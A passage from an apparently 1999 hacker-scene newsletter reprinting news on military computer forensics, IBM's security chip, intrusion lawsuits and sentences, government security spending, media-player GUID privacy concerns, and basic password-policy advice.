called a ``Beowulf cluster,'' technology also used by NASA and some Energy Department researchers.
One lab worker, David Lang, demonstrated how investigators can reassemble and read from a computer's floppy disk that a
criminal trying to hide evidence might cut into pieces and crumple.
The procedure, developed a decade ago but still being perfected, takes ``a day if you're lucky, to a month if it's something you
haven't encountered before,'' Lang said. ``It's basically just a jigsaw puzzle to be put back together.''
Ferguson expects to handle about 400 cases each year from all the military branches, mostly crimes where a computer might have
played part in espionage, deaths or sexual assaults. About 10 percent of cases involve tracing hackers snooping through military
computers.
The new program also trains investigators, who will be assigned full time to military posts and bases worldwide. Typical classes are
three weeks of about a dozen students learning about espionage, hackers, networks and special computer hardware.
``What we intend to handle here is the big and large,'' Ferguson said, citing examples where huge amounts of data need to be
analyzed or where a particularly savvy criminal scrambled his digital records and won't give up his password.
Although Ferguson and others declined to discuss specific cases already under way, they described as rare those involving
encrypted files.
The White House agreed last week to allow sale of the most powerful data-scrambling technology with virtually no restrictions,
although military and law enforcement officials have long warned that criminals and terrorists might also use the technology.
Ferguson said he was confident that techniques to break those messages will be adequate once Congress approves a proposal by
the Clinton administration to give the FBI $80 million over four years for the technology.
Defense Department officials also acknowledged that the lab's proximity to the nearby National Security Agency, the government's
premier code-breaking organization, was a primary factor in deciding its location.
@HWA
06.0 IBM to Launch Security Chip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Code Kid
IBM will unveil today a chip that will include features
such as key encryption and digital signatures. The PC
300PL will be the first IBM computer to include the
security chip. (Hmmm, Not a whole lot of information
here. Can anyone find a link to a data sheet or even
the name of this chip? Will this thing digitally 'sign'
everything? Will the user be able to turn it off?)
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,12997,00.html?cp=reuters
IBM Looks to Lock Down PC
Security
Big Blue hopes its security chip will become a
standard.
by Reuters
September 27, 1999, 8:23 a.m. PT
IBM plans to launch on Tuesday a security system that
it hopes will set the industry standard for protecting
confidential documents, such as those used in the
growing area of electronic commerce.
Unlike previous security measures that rely on software
"firewalls" that filter out unauthorized users of
information, IBM has developed a security chip
embedded within the computer hardware, which, it
says, adds additional levels of security.
"People from outside [of your organization] can get at
your software," says Anne Gardner, general manager of
desktop systems for IBM. "People from the outside
can't get to your hardware."
The first IBM computer to include the security chip will
be the PC 300PL. The company plans to eventually
include the security features in all of its products.
The chip will come installed in the hardware with no
additional cost to the customer, Gardner says.
The features of the security chip include key
encryption, which encodes text messages, and "digital
signatures," which act as unique "watermarks" that
identify the sender of the document.
Share and Share Alike
"We want this to become an industry standard," IBM's
Gardner says. "We want this on as many desktops as
possible."
Asked if IBM would share the technology with
competing hardware makers, she says, "You may see
something along those lines in the future." She
declines to be more specific.
"It's a good strategy not to try to clutch this technology
and try to make money," says Roger Kay, an analyst
at International Data Corporation. "It's a good strategy
to give it away and try to get as many people to go for
it as possible. IBM doesn't want this to be proprietary.
They want it to be ubiquitous."
Kay calls the development "a good first step" toward
making people more comfortable doing business over
the Internet.
"Over the next two years you're going to see an
increased focus on security as more people do
business over the Web," says Joseph Ferlazzo, vice
president of syndicated services for Technology
Business Research.
"It's essential to have a verifiable digital signature that
will allow companies to engage in business
transactions," he adds. "What IBM is trying to do is
make this an essential part of computer configurations
going forward so that the capability will already be
inside the computer."
@HWA
07.0 Law Firm Sued Over Possible Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
Moore Publishing of Pennsylvania is seeking more than
$800,000 in damages from the Washington based legal
firm of Steptoe & Johnson. The suit alleges that an
employee of Steptoe & Johnson attempted to break in
to the computer systems of Moore Publishing. Steptoe
has vehemently denied the charges but Moore claims
that they have logs that will prove their case.
Washington Post
http://search.washingtonpost.com/wp-srv/WPlate/1999-09/20/018l-092099-idx.html
Monday Morning
Monday, September 20, 1999; Page F03
DID YOU HEAR? . . .
"It was probably the biggest disappointment I had in years of economic
development [work] because it seemed so winnable."
-- Richard Monteilh, former D.C. economic development official, on losing
MCI WorldCom Inc. operations to Loudoun County.
Tracking a Hacking
Plenty of lawyers have been called hacks, but lawyers at Steptoe & Johnson
are among the first to be called hackers.
Seeking more than $800,000 in damages, Moore Publishing of Pennsylvania
sued the blue-chip Washington firm for allegedly trying to sneak into one of
the company's Internet domains. The lawsuit, filed last week, alleges that
someone at Steptoe -- they're not sure who -- tried to hack into the site eight
times in August.
"The attempt did not display the mark of genius," said Rodney Sweetland, the
Arlington solo practitioner suing on Moore's behalf. "Whoever did this knew
something about hacking, but not enough to cover their tracks."
Steptoe officials say the suit is completely baseless and that they'll fight it
vigorously. The firm has already rebuffed an overture to settle the matter out
of court.
Sweetland claims that computer logs will prove his case, but he offered only
a sketchy explanation of Steptoe's possible motives. Moore's primary
business is digging up electronic data for companies conducting asset
searches, but it has a sideline as a cyber-squatter. It has purchased the rights
to the Internet domain names of a handful of law firms, apparently hoping to
resell those rights at a later date. Among the names it owns:
Steptoejohnson.com.
Still, it's unclear why any Steptoe employee would care. The firm already
has a Web site at steptoe.com.
-- David Segal
@HWA
08.0 Danish Man Sentenced for Intrusion Attempt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by root
A man, whose name has not been released, has
received a two year suspended sentence for attempting
to break into the personal computer of the head of the
Copenhagen police's special computer crime unit. The
illegal activities took place in January of this year. The
judge in the case did not follow the prosecution's
suggestions to confiscate the accused computer
equipment.
Phoz.dk
http://www.phoz.dk/news/en/bo_trial.html
HNN Archive for January 25, 1999
http://www.hackernews.com/arch.html?012599
Phoz.dk - news
20-year old hacked police officers computer
This is the newest article, covering the actual sentence
"It may sound silly but I did it to help others people".
With a low voice, clearly nervous a 20-year old man explained Wednesday
in Copenhagen Courtroom, how he in January 1999 hacked two different
private computers. He did this using a tool that via the Internet searches
for machines infected with a certain trojan.
The attacker was earlier victim of the same tool so it came natural to warn others against it.
"I now realise that this is illegal. I wasn't certain back then", said the young hacker
who didn't destroy anything during his hacking attempts.
He got a suspended sentence with no limitations and a trial time for two years.
The judge didn't follow the prosecutor's suggestions that the hacker's
computer equipment should be confiscated by the police.
"You have probably got enough warnings," judge Henrik Bitsch said.
The 20-year old hacker was uncovered when he tried hacking a computer
based in the home of a police officer. A anti-virus tool identified
the intruder and lead the police to his house.
...
Danish Hacker Picks Wrong Victim
The first article, don't remember who the author was.
COPENHAGEN, Denmark (Jan. 22, 1999) - A 19-year-old Danish student
picked the wrong victim when he hacked his way into a home computer.
He was arrested Thursday by the machine's owner - the head
of the Copenhagen police's special computercrime unit.
Detective Arne Gammelgaard had installed an anti-virus program in his computer at home.
On Sunday, it warned him about an intruder and enabled him to gather information about
the visitor. Gammelgaard investigated and an Internet provider helped track the hacker.
The student, whose name was not released, confessed to hacking
and said he randomly picked the cyber-cop.
The hacker was released after he was charged with ``unauthorized access to another
person's documents or programs.'' The maximum penalty is six month's imprisonment.
@HWA
09.0 DOE to Spend $80mil on Info Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Sarge
The Department of Energy will spend $80 million over
the next two years to create a security net for its
systems. A four point plan covering policy, personnel,
operational and technical requirements has been
approved by DOE senior management. This new plan
comes soon after the Los Alamos espionage scandal.
($80 million? Damn thats a lot of dough.)
Government Computer News
http://www.gcn.com/vol18_no32/news/700-1.html
September 27, 1999
DOE sets security course
Department will allot $80 million to bolstering data controls
By Frank Tiboni
GCN Staff
The Energy Department will spend $80 million over the next two years to create a
security net for its systems, chief information officer John Gilligan said of the
cybersecurity plan he will roll out departmentwide next month.
The four-point plan calls for sweeping changes in how the department protects its data
re-sources, Gilligan said. He said the plans four areas address policy, personnel,
operational and technical requirements. He submitted the plan to Energy senior
management late last month and got the green light to begin work immediately.
To make sure that new security initiatives take hold beyond department headquarters, Gilligan has asked field
sites to designate CIOs or equivalent officials as lead security officers.
The obvious first step is awareness, Gilligan said, so a major component of the plan is training and education.
The department will begin a two-year, $2 million multimedia program right away, he said.
Secretary Bill Richardson initiated several security re-forms in the wake of the Los Alamos espionage scandal,
including giving computer security oversight to Gilligan [GCN, May 24, Page 1].
A central component of Richardsons reform package directs Gilligan to improve the security of information that
is stored, processed or transmitted by Energy systems.
The reforms also realigned the CIOs office under the new Office of Security and Emergency Operations, which is
headed by former Air Force Gen. Eugene E. Habiger [GCN, June 28, Page 1].
The 47-page systems security planwhich Gilligans staff had been working on since mid-May with help from
Booz, Allen & Hamilton Inc. of McLean, Va., Electronic Data Systems Corp. and Mitre Corp. of Bedford,
Mass.details ongoing and planned activities. Gilligan said the department will use it as a cybersecurity road
map for the next five years.
Its a sound plan thats comprehensive, addresses needs and is doable, he said. It will clearly allow us to
achieve a significant improvement in computer security in the next two years.
Gilligan said he will coordinate the execution of the plan through the departments Field Management Council.
During Phase 1, which takes place from October through December, more than 1,000 systems administrators
and managers at the departments national laboratories will undergo training in network security, system-specific
configuration planning, Web server security, mail server security and cybersecurity policies for managers.
Following up on that initial training, Energy will broaden its program to ensure that appropriate training is given to
all DOE personnel and contractors within the next two years. The training will cover the security requirements for
all systemsthose that handle classified information as well as those that handle unclassified data.
Gilligan said another effort will be to improve security operations in the department. Energy will spend $45 million
of the $80 million it is setting aside for systems security through fiscal 2001 on bolstering program management,
monitoring ability and protection know-how.
As part of this effort, Energy will expand the staff of its Computer Incident Advisory Capability at the Lawrence
Livermore National Laboratory in Livermore, Calif., from seven to 25 people over the next year.
CIAC will be Energys first line of defense. It will spearhead intrusion assessment, warning and response, and
the day-to-day monitoring of department systems and networks, Gilligan said.
@HWA
10.0 The Army Wants to Eliminate Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Sarge
The US Army wants to reduce or eliminate password use
by using biometric alternatives for access to computer
and weapons systems. The Army wants unique
identifiers that cannot be stolen or forgotten and is
looking to biometrics as the answer. The Army is
currently conducting a study that will consider the legal
and sociological implications as well as logistical issues
surrounding large-scale biometric recognition.
Government Computer News
http://www.gcn.com/vol18_no32/news/702-1.html
September 27, 1999
The service wants to eliminate passwords for verifying users
By Patricia Daukantas
GCN Staff
The Army will investigate biometric recognition devices as a way to reduce or eliminate password use for
accessing computer and weapons systems.
Commercial biometrics can be leveraged for military systems, said Phillip Loranger, a division chief at the Army
Information System Security Office in the Directorate of Information Systems for Command, Control,
Communications and Computers.
The Army wants soldiers to have unique identifiers that cannot be stolen or forgotten. We need to dump the way
we do passwords, Loranger said this month at a meeting of the Biometric Consortium in Arlington, Va.
The service approved the study early this month and is kicking it off with fiscal 1999 year-end funds. Loranger
declined to put a price on the effort, which he will lead. He said the study, slated for completion by spring, will
consider the legal and sociological implications and the feasibility of large-scale biometric recognition for Army
systems.
Iris recognition, in which an imaging system scans the pattern of an eyes iris, will be the first technology
studied. It has an edge over fingerprint and voice recognition, Loranger said, because it works even when
someone is wearing protective headgear.
Voice doesnt work through a gas mask, Loranger said. Fingerprints cant be taken through rubber gloves. He
said recent innovations allow iris recognition through plastic face shields and eyeglasses.
The system uses a small imaging device, not unlike a digital camera, that plugs into a PC and compares a
users iris image against stored patterns of known users.
The study will also examine fingerprint and voice recognition. Loranger said the Army already collects soldiers
fingerprints. The recognition tools for desktop PCs cost $100 to $2,000, he said, and can be built into keyboards,
mice and notebook computers.
Voice recognition systems can work either at desktop systems or over dial-up lines, re-quiring only a
microphone and a sound card.
The study will examine setting up an Army or Defense Department center for biometric technology. You couldnt
find a better test bed anywhere than the Army, Loranger said, because its computers run at least 17 operating
systems, including legacy OSes.
Too hard
He acknowledged that some systems still will require passwords, at least with todays technology. But asking
soldiers to remember multiple eight-digit, randomly generated pass codes is hard security, Loranger said. The
easier you make reliable security, the better that security will be.
He said he is more interested in integrating off-the-shelf technology into military systems than in conducting an
extensive development effort from scratch.
Loranger said he envisions a time when biometric recognition will even be integrated into the handgrips of guns to
prevent unauthorized use. All it takes is time and money, he said.
@HWA
11.0 MediaPlayer and RealPlayer send GUID's to internet sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
http://www.seattleweekly.com/features/9914/tech-fefer.shtml
Media Player and privacy
BY MARK D. FEFER
ONE PLACE WHERE RealNetworks and Microsoft are unlikely to compete is on the issue of privacy.
There has been a flurry of controversy lately over uniquely identifying numbers embedded in Intel's new
Pentium III chip and Microsoft's Windows 98 operating system. To quell the outrage, Intel has
introduced software that will allow computer users to hide the chip's unique serial number, so that it
can't be used to track users' Web behavior. And Microsoft has pledged that it will no longer collect a number known as the
Globally Unique Identifier, or GUID, when registering Windows 98 users.
All the while, however, people who use streaming media have already been tagged with such a unique, identifying number.
Seattle Weekly has learned that both the RealNetworks' RealPlayer and the Windows Media Player carry GUIDs, and those
numbers are transmitted to any site where you access a streaming file. This opens up at least the possibility of a database in
which all your streaming media use can be recorded (though there is no indication that such a database exists).
Gary Schare, Microsoft's lead product manager for Windows Media Technologies, confirms that each Media Player carries a
GUID. But he says the company keeps no database with those numbers and does not track individual Media Player usage.
RealNetworks officials did not respond to numerous requests from Seattle Weekly to discuss the subject of GUIDs. But
executives in the business of tracking Web usage say that the RealPlayer, too, carries an identifying code. And RealNetworks,
unlike Microsoft, requires you to submit your name and e-mail address before allowing you to download the player.
Every time you click onto a Web page, a variety of information about you is automatically recorded in the site's "log
files"--information such as what kind of browser you use, what page you were last visiting, how long you stayed at the site, etc. If
you use a media player at the site, your media-streaming activities are also recorded, along with your player's ID number.
Bill Piwonka, a product manager at Portland-based WebTrends, which makes the leading software program for sorting and
analyzing log files, says that although media player GUIDs appear in the files, WebTrends does not actually compile those ID
numbers or present them in its reports. "WebTrends doesn't do anything with the number," he says. "We're not really sure what
it's there for or how it's used."
On the other hand, Piwonka notes, "There's no way for us to know if Microsoft or Real have put something in there that helps
them track." Computer programmer Richard M. Smith, the head of Phar Lap Software, who first drew attention to the Windows
98 GUID last month, says the only way to find out would be to "put a 'packet sniffer' on, and see what's going down the wire"
when you call up a media stream.
But Gary Schare of Microsoft insists that "the only place [the GUID] appears is in the log files. We don't ever pass that
information around, or back to Microsoft in any way." Schare says the only contact between the player and Microsoft is through
"our upgrade mechanism," whereby a player will "ping" the Microsoft server, and you'll be automatically "reminded" to upgrade if
you don't have the current Player version. But even that mechanism, while in place, has not been activated, Schare says.
So why is the GUID even there? At press time, Schare said he did not know the technical justification. "I know there's a good
reason. We don't just stick stuff like that in randomly."
Jason Catlett, who runs the privacy watchdog Junkbusters, speculates that the GUID could be useful for apprehending copyright
violators. Just as the Windows 98 GUID is imprinted in documents created with Microsoft Office, the GUID from your player
could be imprinted into the media file, Catlett speculates, and that could help track down the source of any unauthorized
copying.
But Schare contends that streaming files are untouched. "It's read only. There's no tracking in a piece of content as to who's
played this. That doesn't occur."
@HWA
12.0 GTE accidentally sends unlisted numbers to telemarketers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
California's second-largest telephone company included about 50,000 unlisted numbers and addresses in
the lists that they routinely sell to telemarketers, AP reported.(1998/4/17)
@HWA
13.0 ``Relationship Marketing?'' We have to talk...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by FProphet
http://www.junkbusters.com/ht/en/new.html
Susan Fournier, author of Preventing the Premature Death of Relationship Marketing has found that
``consumers are growing irritated and overwhelmed by the personal information being gathered about
them in the name of direct marketing. One woman recently canceled her supermarket loyalty card after
she received a personalized letter reminding her that it was time she bought more tampons.''
-- The Economist (1998/3/14, p. 68)
@HWA
14.0 News and views from SLa5H
~~~~~~~~~~~~~~~~~~~~~~~~~
* N E W S B Y S L a 5 H *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If You would like to contribute something contact me (smuddo@yahoo.com) or Cruciphux at cruciphux@dok.org .Allso check out my site at:
http://members.xoom.com/_XOOM/dao32/
Content
~~~~~~~
1.HOT NEWS
- Hacker Pleads Guilty To Grade-Fixing'
- Are Eastern Europe's Banks Being Cracked?
- Implementing Security Measures
- Activists Pull Stunt To Show Crypto Holes
- U.S., Network Solutions Reach Agreement
- CMGI to acquire free ISP 1stUp
- Microsoft - ActiveX Holes
- Privacy Groups Wary Of Encryption Reforms
- Wild Wild Web
- Desperate countdown to ready Cold War remnants for Y2K
- Computer wizards crack code in worldwide challenge
- U.S. finds malicious code changes in Y2K "fixes"
- financial firms create Net crime watch
- SEC investigates NetRoadshow security breach
- Court to revisit encryption ruling
- Microsoft Patches IE Security.....Again
- Justice Dept. Funds Antihacking Campaign
- Quantum confidential
- Online Credit Card Security Fears Waning, But Still a Factor
- India: Code-Smuggling? Absurd
2.SPECIAL
- Hacking in 1999 | Courent state of hacking
3.VULNERABILITYS
- Linux Kernel 2.2.x ISN Vulnerability
4.READING MATERIAL
- Mastering Network Security
- Cisco IOS Network Security
- Cryptography and Network Security : Principles and Practice
- Internet Security : Professional Reference
1. H O T N E W S
~~~~~~~~~~~~~~
Hacker Pleads Guilty To Grade-Fixing' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An 18-year-old computer hacker who boosted grades for fellow high school students in exchange for money has pleaded guilty to one count of felony computer trespass.
Sentencing for Adam R. Jerome was scheduled for Oct. 7 in Clark County Superior Court. Jerome's accomplice in the crime, Phillip J. Latimer, also 18, pleaded guilty Friday to a lesser charge of misdemeanor computer trespass.
"Mr. Latimer was essentially the marketing person for Mr. Jerome's services," deputy prosecutor Beau Harlan told Judge Barbara Johnson.
Latimer collected between $2 and $80 from 22 Evergreen High School students, most of them seniors, who wanted their transcripts altered. He was handed a 30-day sentence -- two days in Clark County Jail and 28 days on work crew -- and will be on probation for one year.
Harlan said he'll recommend a 90-day sentence for Jerome, who was on juvenile probation for burglary when he hacked into the school district's computer system. Jerome altered 31 transcripts in all, Harlen said.
Word of the grade-boosting surfaced in April. Jerome and Latimer were charged in June.
School officials estimate it will cost more than $15,000 to upgrade the security on the computer system, Harlan said. Latimer and Jerome will be ordered to pay restitution. Jerome's lawyer, Jon McMullen, said his client had no idea hacking into the school's computer system was a felony.
"He knew what he was doing was wrong, but it's a question of how wrong," McMullen said. "He thought he might be expelled, but not labeled a felon for the rest of his life."
Latimer, who has no prior criminal record, said the hacking started as a prank. "To this day I can't really say why I did it," Latimer said. "I just honestly know it was a mistake." Prosecutors decided not to charge the students who paid to have their grades changed. They were suspended from school for 10 days.
Are Eastern Europe's Banks Being Cracked? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A few weeks ago, marketing companies in the Czech Republic received an anonymous e-mail from a self-proclaimed computer security expert. The e-mail's author boasted of having just penetrated the system of the largest bank in the country.
The network cracker was offering to sell to the marketing firms information about Ceska Sporitelna's 2.5 million customers including where they worked, how much they made and their account numbers. As Czech reporters struggled to unravel the case, they were hindered by contradictory revelations from the police department and the bank. Early reports, attributed to an unnamed police source, carried full details of the alleged hack, saying that the bank's systems had indeed been penetrated, and that detectives had verified the authenticity of the data.
But by the middle of last week, the police department was no longer answering questions, saying an information embargo had gone into effect on Sept. 15. The day before, the bank's general director had issued a statement saying that the hacks had never happened, and were merely an effort to discredit the state-run bank, which is gearing up for privatization. Then the bank, too, stopped commenting.
The International Chamber of Commerce, a body of companies and trade associations from 130 countries, says its anxiety about such cases is growing. As financial institutions around the world continue to bring services online, security measures become more imperative and more vulnerable than ever. According to Blue Sky Research in Paris, European Internet sites in particular are growing by large percentages. Blue Sky reported in July that the number of banking sites in Europe had grown from 863 in November 1998 to 1,845 by the following summer.
Pottengal Mukundan, the director of the ICCs Commercial Crime Services division, says the biggest complication is that banks don't want the world to know when a breach has occurred. "For the last couple of years we have been looking at this problem," Mukundan says. "We can't speak of examples, because this is a sensitive subject. Banks in particular don't wish these cases to be made public."
In response, Mukundan says the ICC is readying a special unit to tackle cybercrime. The unit will make its public debut in London at the end of the year, at the Alliance Against Cybercrime conference. The new department, he says, will allow companies to keep their worries private. The unit hopes to solve cybercrimes without exposing banks to dangerous publicity.
"Basically, we act as a club for our members so they can talk to us in confidence," Mukundan says. "Normally, in matters such as fraud, banks and insurance companies are very hesitant to talk to other banks. The idea in forming the [cybercrime] bureau is that they will feel a little more secure in telling us what their experiences are. We will then hold on to the information and pass it on to other [companies] without revealing the source." A similar approach, he adds, has worked in other industries like international shipping.
The ICC's closed-door plan holds particular appeal for banks in Eastern Europe and developing nations, according to Evan Neufeld, VP of international research at Forrester Research (FORR) in London. Competition, market regulation and law-enforcement agencies in prevent banks in the U.S., Western Europe and developed Asia from hiding security breaches.
Implementing Security Measures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
So far we have talked about your risks, known exploits and bugs, and your policies or lack of them, but now we we start to get into the meat of Internet and network security. It is now time to start implementing security measures on your system.
We are going to start with passwords. We begin here because (a) It is a pet peeve of mine that system and network passwords are so often badly managed, (b) This is the first and most important link in your security chain, and (c) it is a very easy place to start.
This part of basic password policy I have gone over before
but it is so basic and so important that I feel that repeating it is worth it. Make your passwords secure by following certain rules. Here are some do's and don'ts: Don't Use the following for passwords:
Your first name. Your last name. Your login name. Your pet's name. Any name at all. SS number. House number. Telephone number. Your bank PIN. Any password shorter than six characters.
Do Use passwords of six characters or more. Use a combination of letters and numbers. Use a combination of letters, numbers, and special characters.
What makes a password secure is the amount of complexity you have in creating the password. This complexity is not just to prevent someone from guessing what the password is, but also to thwart the efforts of crackers who use special cracking software to crack a password. Password cracking programs work by using a dictionary of words to compare the passwords to. This means that any word at all can easily be discovered. Any word that can be found in a dictionary, no matter how obscure it may seem, can easily be revealed. Most password cracking program , after using the dictionary approach will then start using combinations of letters. A password that has a what seems like a random sequence of pure letters is also easily cracked. I was able to crack the password "kgjhuy" in under two minutes. The next attack a password cracking program will use is a combination of letters and numbers. I was able to crack the password "jim1952" in under 10 minutes. Similarly the password "j1i9m52" took a couple of hours to crack. The password "jim&1*9!52#" has not been cracked yet after more than 12 hours. So the most secure password is one that is more than six characters long and is a combination of letters, numbers, and special characters that are intermixed within the password.
So now that you have set your password policy, it is time to enforce it. Just by telling everyone that their passwords must be six characters or more and contain a mix of letters, numbers, and special characters, does not mean that they will do this. While doing a password audit once, I found that some people had no password, some used their login name as their password while others used the same letter or number six times. So how do you enforce password policy? Windows NT gives you rudimentary tools for enforcing password policy. If you open the User Manager For Domains (as administrator, of course) and go to the menu "Policies" and choose "account". You are presented with a properties page for passwords. Here you can set the password length, days until expiration, lockout retries and password history. Let me go over what each of these is for.
Minimum Password Length is somewhat self explanatory. You can set the value for the minimum length a password must be here. If you set it to 6, then each user in that domain must choose a password that is at least six characters long.
Days until expiration or Maximum password age allows you to set the length of time that will pass before a user has to change their password. In high security areas the maximum password age is set for 7 days or even as low as 1 day. For most people somewhere between 30-90 days will suffice.
Account lockout is so you can set the maximum number of retries a person has until that account is locked out. This prevents someone from trying to repeatedly guess a users password. Don't set this number too low. Many administrators set this at 3 but I feel that this is too low. If you mess up on the first try, you only have two more tries before your account is locked. I would set this number to 5 or 6. This gives the user some fudge room while at the same time prevents password guessing by unauthorized individuals.
Password history or Uniqueness prevents the user from choosing the same password over and over. Unless you assign passwords to your users, do not set this value too high. If the user must always choose a completely new password every 30 days, they will run out of password ideas. This of course, will make your job harder because the users will forget what the password was that they created thus making you have to unlock their account several times a week.
Unfortunately, there is no way to specify that the user must have a mix of letters, numbers, and special characters from within Windows NT. For that kind of control you must use a third party software product to do this. Products like "Password Appraiser" and "Password Policy Enforcer" let you set and enforce a strong password policy across the enterprise.
With Unix or Linux operating systems, the default password policy is very lax. In fact, you can set up a root account with no password at all if you wish. Of course this is different with different versions of Unix, some versions are more lax than others. You can set password policies rather easily in *nix with some simple scripts. If you are reasonably proficient in Perl, you can write a simple script that will specify password length, types of characters and password expiration without having to go out and buy a third party solution. If Perl is not your thing, I have provided a link below that has some sample scripts that you can use. Another point to note is that many Unix password files are not very securely encrypted. It would not take much effort to crack the passwords in passwd file. For this reason you might want to consider other measures to ensure strong password encryption. For Linux you can use the Password Shadow Suite. The Linux Shadow Password Suite gives you strong encryption of your passwd file that resists brute force cracking techniques.
Passwords are the first link in your security chain. If this link is weak, then your whole chain is broken and no combination of firewalls, proxies or other measures will keep your network secure. Focus on your passwords first and then you can add other security tools as you need them.
Activists Pull Stunt To Show Crypto Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The British Home Secretary has been sent a potentially incriminating e-mail by a pressure group trying to show that a draft e-commerce law could see innocent people falsely imprisoned.
Stand -- a group campaigning against controversial measures in the Electronic Communications Bill to govern the supply and use of encryption -- said on Monday it had sent Jack Straw an e-mail containing a confession to a crime. This had been encrypted with a key created in Straw's name and registered on international public key servers,
"The police may come and demand that you supply the key requiredto make this message intelligible," the letter said. "If you fail to do so, you would be committing an offense under the [Electronic Communications] Bill rendering you liable to imprisonment for up to two years.
"The fact that you don't possess this key won't help you unless you can prove that you don't have it. I wish you well in proving that it isn't hidden away on a disk in your secretary's home, or squirreled away on the Internet somewhere."
The group, supporting the view of lawyers who have spoken on the subject, argued the draft legislation would reverse the "innocent until proven guilty" principle.
Last week, Nicholas Bohm of the Law Society told a conference the bill would reverse the burden of proof and breach the European Convention on Human Rights that protects against self-incrimination.
At the same Scrambling For Safety 3.5 conference, the new e-commerce minister Patricia Hewitt defended the Bill saying its requirements were no different than the police being able to develop a roll of film found in a defendant's home when searched.
But Bohm argued the bill's powers were closer to the analogy of forcing the accused to develop a film themselves if it required special processing and the police could not develop it. In current law, suspects do not commit a crime if they decline to do this. He also used the analogy of a booby-trapped safe, where the contents could be destroyed if it was opened. The police could not currently force a suspect to deactivate any such privacy measures.
"Even if you can prove that you don't have it, you would still be liable for imprisonment unless you give information to the police that enables them to decrypt the key," the letter said. "Unfortunately for you, this is impossible, because we've destroyed all copies."
A Home Office spokeswoman said the department didn't believe the bill would reverse the burden of proof as the prosecution would still have to prove guilt beyond a reasonable doubt in all cases. She conceded that confusion may have arisen from putting specific defenses on the face of the Bill. Such as: "If you don't have the key, but you give as much information as possible about how it could be obtained," she said.
Of the letter, the spokeswoman said people could be falsely incriminated in this way today without the Bill and without encryption being involved.
"We think that's almost a red herring,"
U.S., Network Solutions Reach Agreement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet address registrar Network Solutions and the U.S. Commerce Department have finally reached an agreement to offer competitors long-term access to the company's domain name database, a source familiar with the deal said Monday.
Following almost a year of negotiations, Herndon, Va.-based Network Solutions has agreed to let competing companies register new Internet addresses for a fee of $6 per year, well below the $35 per year Network Solutions charges its customers.
The company will continue to manage the database of already registered names for at least four more years, under the agreement.
In essence, other companies will be able to compete for the "retail" business of registering new domain names, while Network Solutions will continue to run the "wholesale" business of keeping track of already registered names and informing Internet servers how to route traffic.
During an ongoing, several month "test" of competition, a handful of companies were allowed to register Internet address names into the Network Solutions database for a fee of $9 pername, per year.
Network Solutions has also agreed to be overseen, as its new competitors are, by the Internet Corporation for Assigned Names and Numbers (ICANN), a California nonprofit tapped last year by the Commerce Department to administer the domain name system.
The agreement is to be announced at a Commerce Department press conference on Tuesday.
Under an agreement with the government that expired last year, Network Solutions was the only company permitted to register Internet domain names, the addresses of websites, e-mail, and other Net resources, that ended with the popular .com, .net and .org suffixes.
But the Clinton administration decided to privatize the system, handing the reins over to ICANN last November and earlier this year, letting firms compete with Network Solutions for the first time.
Since then, ICANN has struggled to get off the ground, running into criticism from Internet users and members of Congress for making decisions behind closed doors and proposing to fund itself with a fee of $1 per domain name.
And Network Solutions battled the Commerce Department and Congress as it asserted ownership of the list of more than 5 million domain names it registered before the onset of competition.
On Monday, a spokesman for Network Solutions declined to comment.
A spokesman for the Commerce Department said Secretary William Daley would make a statement on the domain name situation at Tuesday's press conference.
Network Solutions stock rose 5 7/8 to 72 13/16 in trading of over 1.2 million shares on the Nasdaq on Monday.
CMGI to acquire free ISP 1stUp ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Internet holding company CMGI said today that it has agreed to buy free Internet service wholesaler 1stUp.com, in a move that solidifies the company's moves toward creating a full-service Web access and content powerhouse.
San Francisco-based 1stUp is the same company that provides CMGI affiliate AltaVista with its free ad-subsidized Internet access service, launched in August. The start-up also has signed a deal to provide its free service to Bolt.com, a teen-oriented Web portal.
The deal comes as CMGI has been moving to more closely integrate its various Web properties in hopes of taking on established Web players like Yahoo and America Online
Microsoft - ActiveX Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators.
The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users tranfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site.
"The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month.
Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages.
ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control. With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities.
In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said.
